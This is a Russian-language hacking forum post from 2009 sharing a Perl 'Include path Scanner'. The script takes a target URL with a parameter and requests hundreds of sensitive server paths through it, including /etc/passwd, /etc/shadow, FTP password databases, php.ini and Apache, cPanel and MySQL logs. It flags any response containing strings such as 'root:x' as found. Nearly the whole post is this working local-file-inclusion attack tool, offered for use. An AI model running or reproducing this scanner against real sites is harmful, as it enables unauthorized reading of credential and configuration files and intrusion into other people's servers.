|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
простенький Include path Scanner, мало путей, позже добавлю больше.
Код:
#!/usr/bin/perl
use LWP::UserAgent;
system('cls');
print qq(
###########################
# Include path Scanner #
# coded by ph1l1ster #
###########################
);
print "\n\n\nPlease enter site adress.\n";
print "e.g.: http://google.com/?id=\n\n";
print "> ";
$site = <STDIN>;
chomp($site);
@patchs = ('/etc/passwd','/etc/shadow','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/etc/ftpchroot',
'/etc/ftphosts','/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts',
'/etc/wu-ftpd/ftpusers','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf',
'/etc/proftpd/modules.conf','/etc/mysql/my.cnf','/etc/my.cnf','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/httpd/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini',
'/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/etc/php.ini','/etc/logrotate.d/proftpd','/etc/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/httpd/conf/httpd.conf',
'/etc/http/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/logrotate.d/ftp','/etc/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache/conf/httpd.conf','/etc/apache2/httpd.conf',
'/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','/etc/pure-ftpd/pure-ftpd.conf',
'/logs/error.log','/logs/access.log','/logs/error.log','/logs/access.log','/logs/error.log','/logs/access.log','/logs/error.log','/logs/access.log','/logs/error.log','/logs/access.log',
'/logs/error.log','/logs/access.log','/logs/error.log','/logs/access.log','/logs/error.log','/logs/access.log','/logs/error.log','/logs/access.log','/logs/error.log','/logs/access.log',
'/logs/error.log','/logs/access.log','/apache/logs/access.log','/logs/pure-ftpd.log',
'/usr/local/apache/logs/access_ log','/usr/local/apache/logs/access. log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log',
'/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf',
'/usr/local/apps/apache/conf/httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf',
'/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini',
'/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini',
'/usr/local/etc/apache/vhosts.conf','/usr/local/Zend/etc/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log',
'/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/usr/local/cpanel/logs/stats_log','/usr/sbin/pure-config.pl',
'/usr/etc/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl',
'/usr/local/pureftpd/etc/pure-ftpd.conf','/usr/ports/ftp/pure-ftpd/','/usr/ports/net/pure-ftpd/','/usr/pkgsrc/net/pureftpd/','/usr/ports/contrib/pure-ftpd/',
'/var/www/logs/access_log','/var/www/logs/access.log','/var/log/apache/access_log','/var/log/apache2/access_log','/var/log/apache/access.log','/var/log/apache2/access.log',
'/var/log/access_log','/var/log/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/log/apache/error_log',
'/var/log/apache2/error_log','/var/log/apache/error.log','/var/log/apache2/error.log','/var/log/error_log','/var/log/error.log',
'/var/log/httpd/access_log','/var/log/httpd/error_log','/var/log/httpd/access_log','/var/log/httpd/error_log','/var/www/logs/access_log','/var/www/logs/access.log',
'/var/www/logs/error_log','/var/www/logs/error.log','/var/log/httpd/access_log','/var/log/httpd/access.log','/var/log/httpd/error_log','/var/log/httpd/error.log',
'/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log',
'/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/access_log','/var/log/access.log','/var/log/error_log','/var/log/error.log','/var/www/logs/access_log',
'/var/www/logs/access.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/access_log','/var/www/logs/error_log','/var/www/logs/error.log',
'/var/log/apache/error_log','/var/log/apache/error.log','/var/log/access_log','/var/log/error_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log',
'/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf',
'/var/log/proftpd','/var/log/vsftpd.log','/var/log/xferlog','/var/adm/log/xferlog','/var/log/pure-ftpd/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log',
'/var/log/ftp-proxy','/var/log/ftplog','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog',
'/var/log/exim/rejectlog','/var/log/exim_rejectlog','/var/local/www/conf/php.ini','/var/www/conf/httpd.conf',
'/apache/logs/error.log','/apache/logs/access.log','/apache/logs/error.log','/apache/logs/access.log','/apache/logs/error.log','/apache/logs/access.log','/apache/logs/error.log',
'/apache/logs/access.log','/apache/logs/error.log','/apache/logs/access.log','/apache/logs/error.log','/apache/logs/access.log','/apache/logs/error.log',
'/apache/logs/access.log','/apache2/logs/error.log','/apache2/logs/access.log','/apache2/logs/error.log','/apache2/logs/access.log','/apache2/logs/error.log',
'/apache2/logs/access.log','/apache2/logs/error.log','/apache2/logs/access.log','/apache2/logs/error.log','/apache2/logs/access.log','/apache/logs/error.log',
'/apache/logs/access.log','/apache/logs/error.log','/apache/logs/access.log','/apache/logs/error.log','/apache/logs/access.log','/apache/logs/error.log','/apache/logs/access.log',
'/apache/logs/error.log','/apache/logs/access.log','/apache/logs/error.log','/apache/logs/access.log',
'/opt/lampp/logs/access_log','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log',
'/Program Files\Apache Group\Apache\logs\access.log','/Program Files\Apache Group\Apache\logs\error.log','/Program Files\Apache Group\Apache\conf\httpd.conf',
'/Program Files\Apache Group\Apache2\conf\httpd.conf','/Program Files\xampp\apache\conf\httpd.conf',
'/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default',
'/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
'/bin/php.ini','/web/conf/php.ini','/opt/xampp/etc/php.ini','/php5\php.ini','/php4\php.ini','/php\php.ini','/PHP\php.ini','/WINDOWS\php.ini','/WINNT\php.ini','/apache\php\php.ini','/xampp\apache\bin\php.ini','/NetServer\bin\stable\apache\php.ini','/home2\bin\stable\apache\php.ini','/home\bin\stable\apache\php.ini','/www/logs/proftpd.system.log',);
print "\n### Scanning....\n\n";
foreach $patchs( @patchs){
$url = $site.$patchs;
$start = LWP::UserAgent->new( ) or die;
$ans = $start->get($url);
if ($ans->content =~ /bin:x|root:x|phpmyadmin|cpanel|nologin/)
{
print "$url \n<<< ## FOUND ## >>>\n";
}
else
{
print "$url # not found!\n";
}
}
Последний раз редактировалось ph1l1ster; 25.03.2009 в 16:13..
|